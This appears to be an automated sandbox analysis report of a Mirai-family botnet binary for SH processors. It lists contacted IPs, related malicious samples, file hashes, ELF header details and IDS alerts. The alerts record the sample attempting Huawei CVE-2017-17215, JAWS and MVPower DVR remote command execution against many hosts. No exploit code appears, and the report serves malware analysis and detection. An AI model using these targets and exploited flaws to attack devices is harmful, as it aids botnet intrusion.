                9808CMNET-GDGuangdongMobileCommunicationCoLtdCNfalse
                179.114.240.244
                unknownBrazil
                26599TELEFONICABRASILSABRfalse
                41.103.192.32
                unknownAlgeria
                36947ALGTEL-ASDZfalse
                34.237.89.255
                unknownUnited States
                14618AMAZON-AESUSfalse
                197.49.76.111
                unknownEgypt
                8452TE-ASTE-ASEGfalse
                41.95.142.165
                unknownSudan
                36998SDN-MOBITELSDfalse
                44.60.227.19
                unknownUnited States
                7377UCSDUSfalse
                205.237.185.42
                unknownUnited States
                26793ICS-LLCUSfalse
                156.139.17.124
                unknownUnited States
                3356LEVEL3USfalse
                107.129.25.87
                unknownUnited States
                7018ATT-INTERNET4USfalse
                197.87.15.2
                unknownSouth Africa
                10474OPTINETZAfalse
                129.231.54.226
                unknownUnited States
                7256VIACOM-ASUSfalse
                41.255.9.214
                unknownLibyan Arab Jamahiriya
                21003GPTC-ASLYfalse
                18.86.170.254
                unknownUnited States
                3MIT-GATEWAYSUSfalse
                211.160.156.73
                unknownChina
                9814FIBRLINKBeijingFibrLINKNetworksCoLtdCNfalse
                197.159.231.60
                unknownunknown
                36974AFNET-ASCIfalse
                41.19.208.240
                unknownSouth Africa
                29975VODACOM-ZAfalse
                19.171.194.70
                unknownUnited States
                3MIT-GATEWAYSUSfalse
                133.189.199.227
                unknownJapan4729JAEAJapanAtomicEnergyAgencyJPfalse
                159.188.11.85
                unknownUnited States
                34058LIFECELL-ASUAfalse
                156.168.245.29
                unknownEgypt
                36992ETISALAT-MISREGtrue
                41.244.207.155
                unknownCameroon
                37620VIETTEL-CM-ASCMtrue
                197.207.96.120
                unknownAlgeria
                36947ALGTEL-ASDZtrue
                184.176.206.156
                unknownUnited States
                22773ASN-CXA-ALL-CCI-22773-RDCUSfalse
                197.239.213.44
                unknownunknown
                36974AFNET-ASCIfalse
                101.0.241.188
                unknownTaiwan; Republic of China (ROC)
                18046DONGFONG-TWDongFongTechnologyCoLtdTWfalse
                156.161.209.230
                unknownEgypt
                36992ETISALAT-MISREGtrue
                99.146.140.36
                unknownUnited States
                7018ATT-INTERNET4USfalse
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                156.66.57.2420a719AoeXz.elfGet hashmaliciousMiraiBrowse
                  197.105.204.215JP9HCJhZs0.elfGet hashmaliciousMirai, MoobotBrowse
                    41.57.244.24dDPKtLvVp6.elfGet hashmaliciousMirai, MoobotBrowse
                      4FlBKQHHPUGet hashmaliciousMiraiBrowse
                        41.184.27.238I6RPrB3YqOGet hashmaliciousMiraiBrowse
                          134.254.164.251gdbhUbyHV7.elfGet hashmaliciousMiraiBrowse
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            woofwoof.cfdsYgsg1JAC0.elfGet hashmaliciousMiraiBrowse
                            • 94.156.71.59
                            jctfniJKR0.elfGet hashmaliciousMiraiBrowse
                            • 94.156.71.59
                            QSX0atAPpN.elfGet hashmaliciousMiraiBrowse
                            • 94.156.71.59
                            t4p0nt07.x86.elfGet hashmaliciousMiraiBrowse
                            • 94.156.64.221
                            t9lNEiD3ui.elfGet hashmaliciousMiraiBrowse
                            • 94.156.64.221
                            G7b98y6IWj.elfGet hashmaliciousMiraiBrowse
                            • 94.156.64.221
                            ACKpfvO313.elfGet hashmaliciousMiraiBrowse
                            • 94.156.64.221
                            vh9HOxBJJN.elfGet hashmaliciousMiraiBrowse
                            • 94.156.64.221
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            TE-ASTE-ASEGsYgsg1JAC0.elfGet hashmaliciousMiraiBrowse
                            • 156.204.73.146
                            jctfniJKR0.elfGet hashmaliciousMiraiBrowse
                            • 156.223.50.219
                            QSX0atAPpN.elfGet hashmaliciousMiraiBrowse
                            • 197.60.132.30
                            Q08dqv9CHC.elfGet hashmaliciousMiraiBrowse
                            • 41.34.127.129
                            h.x86-20240610-0050.elfGet hashmaliciousMirai, OkiruBrowse
                            • 41.235.75.243
                            bVMuPnsMIq.elfGet hashmaliciousMiraiBrowse
                            • 102.42.245.58
                            YfM6hAPQaS.elfGet hashmaliciousMiraiBrowse
                            • 156.198.173.237
                            9W8C6mXhAB.elfGet hashmaliciousMiraiBrowse
                            • 197.55.34.212
                            TGYj8HxqY9.elfGet hashmaliciousMiraiBrowse
                            • 156.197.112.199
                            P3OiWwQzRo.elfGet hashmaliciousMiraiBrowse
                            • 41.45.223.110
                            Reflex-SolutionsZAycWb26lVAe.elfGet hashmaliciousMiraiBrowse
                            • 197.221.108.174
                            kl7nWo7u71.elfGet hashmaliciousGafgyt, MiraiBrowse
                            • 197.221.108.106
                            aT0T5g9qvp.elfGet hashmaliciousMiraiBrowse
                            • 197.221.108.129
                            fXB7ExbJpI.elfGet hashmaliciousMirai, MoobotBrowse
                            • 197.221.108.114
                            x86.elfGet hashmaliciousMirai, MoobotBrowse
                            • 197.221.108.115
                            zpbWkmw0VY.elfGet hashmaliciousMirai, MoobotBrowse
                            • 197.221.108.115
                            omLMIQ8D45.elfGet hashmaliciousMiraiBrowse
                            • 197.221.108.152
                            Pe1o2szAzP.elfGet hashmaliciousMiraiBrowse
                            • 197.221.108.101
                            FJTzVSzSXR.elfGet hashmaliciousMirai, MoobotBrowse
                            • 197.221.108.116
                            COWJ55ChOf.elfGet hashmaliciousMirai, MoobotBrowse
                            • 197.221.108.132
                            KENET-ASKEarm7.elfGet hashmaliciousMiraiBrowse
                            • 41.89.178.152
                            arm4.elfGet hashmaliciousMiraiBrowse
                            • 41.89.178.128
                            skid.x86_64.elfGet hashmaliciousMirai, MoobotBrowse
                            • 197.137.108.192
                            bot.mpsl.elfGet hashmaliciousMirai, MoobotBrowse
                            • 197.137.162.218
                            arm.nn.elfGet hashmaliciousMiraiBrowse
                            • 41.89.178.180
                            mips.nn.elfGet hashmaliciousMiraiBrowse
                            • 197.136.200.90
                            skt.arm6.elfGet hashmaliciousMiraiBrowse
                            • 197.136.200.26
                            skt.x86.elfGet hashmaliciousMiraiBrowse
                            • 197.137.162.214
                            skt.sh4.elfGet hashmaliciousMiraiBrowse
                            • 41.89.178.164
                            Ixq2ypphWQ.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                            • 197.137.162.246
                            NBDOE-ORGCABEvRxcwqiz.elfGet hashmaliciousMiraiBrowse
                            • 204.81.50.233
                            Y98pGn3FUt.elfGet hashmaliciousMiraiBrowse
                            • 204.81.50.201
                            jcTITjYCy0.elfGet hashmaliciousMiraiBrowse
                            • 204.82.245.220
                            RyN0nKQFMD.elfGet hashmaliciousMiraiBrowse
                            • 204.81.173.61
                            ZfeALk0ts2.elfGet hashmaliciousUnknownBrowse
                            • 204.82.192.33
                            ZpyyEEuSFW.elfGet hashmaliciousMiraiBrowse
                            • 204.81.220.184
                            b3astmode.x86.elfGet hashmaliciousMiraiBrowse
                            • 204.81.50.228
                            3cKES250PA.elfGet hashmaliciousMiraiBrowse
                            • 204.82.110.224
                            akido.arm.elfGet hashmaliciousMiraiBrowse
                            • 204.81.245.6
                            cdFu5RBizJ.elfGet hashmaliciousMiraiBrowse
                            • 204.81.50.238
                            No context
                            No context
                            Process:/usr/lib/x86_64-linux-gnu/xfce4/xfconf/xfconfd
                            File Type:XML 1.0 document, ASCII text
                            Category:dropped
                            Size (bytes):5128
                            Entropy (8bit):4.457618060812407
                            Encrypted:false
                            SSDEEP:96:R14GBdYLSNUH+ZAFQrSRR6dn0tWlTDFwIfM/vfzPpjT9I3jZ/qeH2Wg:74GnYLSNUH+ZAyrSRRYn0taTDKIfMPzv
                            MD5:2A2A7C34B585CDAE5E123F3C5100C253
                            SHA1:E814B1B1531B25581DB76CB813C85E53E1390BA4
                            SHA-256:BCA18B654D038B69B25ACDF84CFF99BF521A1B54F482F1DE2B54CE13AC219A04
                            SHA-512:CEC7A3A7A6AD6C2A6D101A3BF6D89A01EBDCEB0121AA3DE1CEA024268410B39E4E9188382439C7C3FD734C66764B66B13F1D277700B00A2FCB35CB67E31996DD
                            Malicious:false
                            Reputation:moderate, very likely benign file
                            Preview:<?xml version="1.0" encoding="UTF-8"?>..<channel name="xfce4-panel" version="1.0">. <property name="configver" type="int" value="2"/>. <property name="panels" type="array">. <value type="int" value="1"/>. <value type="int" value="2"/>. <property name="panel-1" type="empty">. <property name="position" type="string" value="p=6;x=0;y=0"/>. <property name="length" type="uint" value="100"/>. <property name="position-locked" type="bool" value="true"/>. <property name="icon-size" type="uint" value="16"/>. <property name="size" type="uint" value="26"/>. <property name="plugin-ids" type="array">. <value type="int" value="1"/>. <value type="int" value="2"/>. <value type="int" value="3"/>. <value type="int" value="4"/>. <value type="int" value="5"/>. <value type="int" value="6"/>. <value type="int" value="7"/>. <value type="int" value="8"/>. <value type="int" value="9"/>. <value type="in
                            File type:ELF 32-bit LSB executable, Renesas SH, version 1 (SYSV), statically linked, stripped
                            Entropy (8bit):6.683831579436531
                            TrID:
                            • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                            File name:s8y4CBbFHW.elf
                            File size:74'356 bytes
                            MD5:20bc328ef0647aac4fca80a0067e38f8
                            SHA1:e6aed42419880ef850f77f1ccbe402361bccb9fe
                            SHA256:1cfa6726bfb6144cf26150f61c43716f48e0794f0f950ee40d5316fb9435ea37
                            SHA512:8dac26711efbfbd7f53d42086de6c510d7be874f568cd6362fe982b4bd8a4a973e25271694758a929ae2940857f79485fc841d621a36a4b643f54eca4ed943c0
                            SSDEEP:1536:N/OkFHkwdPBGD2AhuZm67WSyaGtcPzIKHzIHsiJZAX9:N/O+EwOomS0clSlZ
                            TLSH:3C738D32E0146CE2CA2019B5B6EDDD7C0343BD6150666CB16E8DABD84D6FEECB18DB50
                            File Content Preview:.ELF..............*.......@.4.... ......4. ...(...............@...@.....................t ..t B.t B.0...t...........Q.td..............................././"O.n......#.*@........#.*@....&O.n.l..................................././.../.a"O.!...n...a.b("...q.

                            ELF header

                            Class:ELF32
                            Data:2's complement, little endian
                            Version:1 (current)
                            Machine:<unknown>
                            Version Number:0x1
                            Type:EXEC (Executable file)
                            OS/ABI:UNIX - System V
                            ABI Version:0
                            Entry Point Address:0x4001a0
                            Flags:0xc
                            ELF Header Size:52
                            Program Header Offset:52
                            Program Header Size:32
                            Number of Program Headers:3
                            Section Header Offset:73956
                            Section Header Size:40
                            Number of Section Headers:10
                            Header String Table Index:9
                            NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                            NULL0x00x00x00x00x0000
                            .initPROGBITS0x4000940x940x2e0x00x6AX004
                            .textPROGBITS0x4000e00xe00x104e00x00x6AX0032
                            .finiPROGBITS0x4105c00x105c00x220x00x6AX004
                            .rodataPROGBITS0x4105e40x105e40x13d40x00x2A004
                            .ctorsPROGBITS0x4220740x120740x80x00x3WA004
                            .dtorsPROGBITS0x42207c0x1207c0x80x00x3WA004
                            .dataPROGBITS0x4220880x120880x1c0x00x3WA004
                            .bssNOBITS0x4220a40x120a40x9440x00x3WA004
                            .shstrtabSTRTAB0x00x120a40x3e0x00x0001
                            TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                            LOAD0x00x4000000x4000000x119b80x119b86.78960x5R E0x10000.init .text .fini .rodata
                            LOAD0x120740x4220740x4220740x300x9742.28830x6RW 0x10000.ctors .dtors .data .bss
                            GNU_STACK0x00x00x00x00x00.00000x7RWE0x4
                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                            06/10/24-15:38:02.922975TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3304637215192.168.2.13197.142.139.143
                            06/10/24-15:38:00.230283TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5332637215192.168.2.1341.63.57.16
                            06/10/24-15:37:59.986870TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5704437215192.168.2.13156.218.214.250
                            06/10/24-15:38:02.759599TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4396237215192.168.2.1341.212.41.218
                            06/10/24-15:38:02.120500TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5498680192.168.2.1389.231.127.82
                            06/10/24-15:38:02.089268TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4024880192.168.2.1351.171.172.212
                            06/10/24-15:38:02.751686TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5388437215192.168.2.13197.255.245.2
                            06/10/24-15:38:02.134117TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4128680192.168.2.13220.61.58.145
                            06/10/24-15:37:59.996932TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3853837215192.168.2.1341.179.145.152
                            06/10/24-15:37:59.747937TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3282480192.168.2.1370.109.71.255
                            06/10/24-15:38:02.194608TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4183880192.168.2.13164.199.106.8
                            06/10/24-15:38:02.239619TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4801080192.168.2.1370.237.38.161
                            06/10/24-15:38:02.207442TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4714280192.168.2.13207.200.77.20
                            06/10/24-15:37:59.931967TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3761037215192.168.2.13156.89.39.231
                            06/10/24-15:38:02.827129TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4204437215192.168.2.13197.251.250.147
                            06/10/24-15:37:59.933966TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5646037215192.168.2.13156.32.132.93
                            06/10/24-15:38:02.687592TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5615237215192.168.2.13156.149.203.68
                            06/10/24-15:38:02.178384TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4091680192.168.2.13144.53.68.134
                            06/10/24-15:37:59.809084TCP2025883ET EXPLOIT MVPower DVR Shell UCE3532880192.168.2.1351.33.7.198
                            06/10/24-15:38:00.195434TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3451837215192.168.2.13156.156.125.193
                            06/10/24-15:37:59.946134TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3349237215192.168.2.13197.125.224.191
                            06/10/24-15:38:02.306024TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5858280192.168.2.13221.232.64.182
                            06/10/24-15:38:00.162235TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3769837215192.168.2.1341.34.192.208
                            06/10/24-15:38:02.734955TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5733837215192.168.2.13156.126.41.40
                            06/10/24-15:37:59.999497TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3736837215192.168.2.13156.90.232.117
                            06/10/24-15:38:02.647915TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5140437215192.168.2.13197.111.134.175
                            06/10/24-15:38:00.203547TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4567837215192.168.2.13197.246.123.244
                            06/10/24-15:38:00.238002TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5724237215192.168.2.13197.145.93.184
                            06/10/24-15:38:02.488949TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3891037215192.168.2.1341.194.53.246
                            06/10/24-15:37:59.933051TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5310037215192.168.2.1341.97.23.92
                            06/10/24-15:38:02.834263TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3933637215192.168.2.13156.66.48.157
                            06/10/24-15:38:00.160743TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5785437215192.168.2.13156.211.139.234
                            06/10/24-15:38:02.192815TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4747680192.168.2.13217.58.14.173
                            06/10/24-15:38:02.097659TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3303880192.168.2.13211.223.163.145
                            06/10/24-15:38:02.088585TCP2025883ET EXPLOIT MVPower DVR Shell UCE4253280192.168.2.13181.95.234.17
                            06/10/24-15:37:59.965473TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4832837215192.168.2.1341.15.193.245
                            06/10/24-15:37:59.790906TCP2025883ET EXPLOIT MVPower DVR Shell UCE4100280192.168.2.13173.150.225.180
                            06/10/24-15:38:02.095481TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5720680192.168.2.13205.141.193.122
                            06/10/24-15:38:00.165713TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3652237215192.168.2.1341.139.140.243
                            06/10/24-15:38:02.510425TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3707637215192.168.2.13156.245.92.52
                            06/10/24-15:37:59.797691TCP2025883ET EXPLOIT MVPower DVR Shell UCE3984280192.168.2.1313.159.171.238
                            06/10/24-15:37:59.983452TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4404837215192.168.2.13197.255.246.136
                            06/10/24-15:38:02.317684TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4072080192.168.2.13129.130.176.0
                            06/10/24-15:38:02.657284TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5071437215192.168.2.1341.14.88.10
                            06/10/24-15:37:59.973933TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6038837215192.168.2.13197.149.113.57
                            06/10/24-15:38:00.188379TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4457637215192.168.2.13197.152.159.10
                            06/10/24-15:38:02.652273TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3533237215192.168.2.13197.92.239.151
                            06/10/24-15:38:02.085779TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5055680192.168.2.13158.99.97.254
                            06/10/24-15:37:59.942479TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5560637215192.168.2.13197.142.203.17
                            06/10/24-15:38:02.798921TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5894037215192.168.2.13156.145.128.99
                            06/10/24-15:37:59.970506TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6004637215192.168.2.1341.174.115.39
                            06/10/24-15:38:00.197151TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4867437215192.168.2.1341.154.147.59
                            06/10/24-15:38:02.187428TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4975880192.168.2.1341.85.227.153
                            06/10/24-15:38:02.201308TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4183280192.168.2.13122.154.206.75
                            06/10/24-15:37:59.756001TCP2025883ET EXPLOIT MVPower DVR Shell UCE5343480192.168.2.1370.156.171.43
                            06/10/24-15:38:00.001255TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3737637215192.168.2.13156.15.16.186
                            06/10/24-15:38:00.239703TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3393037215192.168.2.1341.183.245.26
                            06/10/24-15:38:00.212309TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5590037215192.168.2.13197.128.202.20
                            06/10/24-15:38:02.502251TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5169437215192.168.2.13197.235.58.223
                            06/10/24-15:37:59.788491TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4604280192.168.2.1331.24.128.114
                            06/10/24-15:38:02.723332TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4750037215192.168.2.13197.47.184.132
                            06/10/24-15:38:00.019873TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4170837215192.168.2.13156.19.135.49
                            06/10/24-15:38:02.100541TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution6021280192.168.2.13118.240.5.99
                            06/10/24-15:38:02.778188TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3601637215192.168.2.1341.186.142.103
                            06/10/24-15:38:02.862438TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5753237215192.168.2.13156.34.17.184
                            06/10/24-15:38:02.869004TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3924437215192.168.2.1341.168.51.174
                            06/10/24-15:38:00.183832TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5096637215192.168.2.13156.110.2.110
                            06/10/24-15:38:02.135367TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5639280192.168.2.13103.245.19.81
                            06/10/24-15:37:59.925134TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6047037215192.168.2.13156.57.11.197
                            06/10/24-15:38:02.644982TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6071837215192.168.2.13156.152.171.196
                            06/10/24-15:38:00.261547TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5160437215192.168.2.13197.95.0.54
                            06/10/24-15:38:02.689784TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5534037215192.168.2.13197.81.221.6
                            06/10/24-15:38:02.118012TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4033680192.168.2.13142.74.226.65
                            06/10/24-15:38:02.259702TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4870680192.168.2.1389.247.19.145
                            06/10/24-15:38:02.776905TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4686037215192.168.2.13197.45.254.180
                            06/10/24-15:38:00.231962TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4985837215192.168.2.13156.36.86.237
                            06/10/24-15:38:00.039932TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3845637215192.168.2.13156.139.95.100
                            06/10/24-15:38:00.233672TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5990437215192.168.2.13197.114.103.51
                            06/10/24-15:38:02.113559TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4784080192.168.2.13122.194.52.31
                            06/10/24-15:38:00.012794TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4915637215192.168.2.13156.245.237.250
                            06/10/24-15:38:00.170870TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5746437215192.168.2.1341.65.114.229
                            06/10/24-15:38:02.500162TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4327037215192.168.2.13156.241.169.48
                            06/10/24-15:38:00.173963TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3304037215192.168.2.13156.217.108.5
                            06/10/24-15:38:02.712763TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5698037215192.168.2.13156.212.245.105
                            06/10/24-15:37:59.943966TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6061437215192.168.2.13156.10.20.117
                            06/10/24-15:37:59.984293TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5266837215192.168.2.13156.197.209.223
                            06/10/24-15:38:02.808787TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5389037215192.168.2.1341.19.84.44
                            06/10/24-15:38:00.201249TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5697637215192.168.2.13156.79.171.4
                            06/10/24-15:38:02.657974TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3844037215192.168.2.13197.63.49.202
                            06/10/24-15:38:02.250691TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3312880192.168.2.13160.15.119.249
                            06/10/24-15:37:59.980839TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3542037215192.168.2.13197.64.121.194
                            06/10/24-15:38:00.002985TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3441237215192.168.2.13156.156.74.74
                            06/10/24-15:38:02.869779TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5820437215192.168.2.13197.36.79.49
                            06/10/24-15:38:02.928461TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4642437215192.168.2.13197.157.72.91
                            06/10/24-15:38:00.208966TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4207437215192.168.2.13156.250.0.84
                            06/10/24-15:38:00.162961TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5530637215192.168.2.13156.199.176.162
                            06/10/24-15:38:02.775920TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3587037215192.168.2.13197.39.173.119
                            06/10/24-15:38:00.266123TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3737037215192.168.2.1341.129.146.218
                            06/10/24-15:38:02.740863TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5923037215192.168.2.1341.111.68.220
                            06/10/24-15:37:59.995486TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5856437215192.168.2.13156.245.2.205
                            06/10/24-15:38:00.017705TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4466237215192.168.2.1341.253.102.61
                            06/10/24-15:38:02.879110TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5805037215192.168.2.1341.150.80.142
                            06/10/24-15:38:02.118708TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4116880192.168.2.13221.178.28.105
                            06/10/24-15:38:02.677116TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4528437215192.168.2.13156.224.70.86
                            06/10/24-15:38:00.243236TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3472437215192.168.2.1341.231.72.216
                            06/10/24-15:38:02.211759TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3612280192.168.2.1396.64.204.162
                            06/10/24-15:38:02.913437TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5968437215192.168.2.1341.187.204.30
                            06/10/24-15:37:59.820455TCP2025883ET EXPLOIT MVPower DVR Shell UCE4850280192.168.2.13145.193.92.118
                            06/10/24-15:37:59.974792TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4474037215192.168.2.1341.38.164.93
                            06/10/24-15:37:59.864921TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3710880192.168.2.1386.248.77.229
                            06/10/24-15:38:00.258036TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5285237215192.168.2.13197.130.110.26
                            06/10/24-15:38:00.183026TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5352837215192.168.2.1341.9.80.183
                            06/10/24-15:38:02.497343TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5843437215192.168.2.13197.149.87.73
                            06/10/24-15:38:00.020596TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5662037215192.168.2.13156.24.110.61
                            06/10/24-15:37:59.975667TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3653037215192.168.2.13156.231.3.185
                            06/10/24-15:38:02.780766TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5734037215192.168.2.1341.177.168.250
                            06/10/24-15:38:00.215590TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5753437215192.168.2.13156.166.206.200
                            06/10/24-15:38:02.666292TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3452437215192.168.2.13197.151.209.193
                            06/10/24-15:37:59.978246TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6025637215192.168.2.1341.204.133.93
                            06/10/24-15:38:02.491066TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4795037215192.168.2.13156.134.197.214
                            06/10/24-15:38:00.193307TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3465237215192.168.2.1341.154.67.6
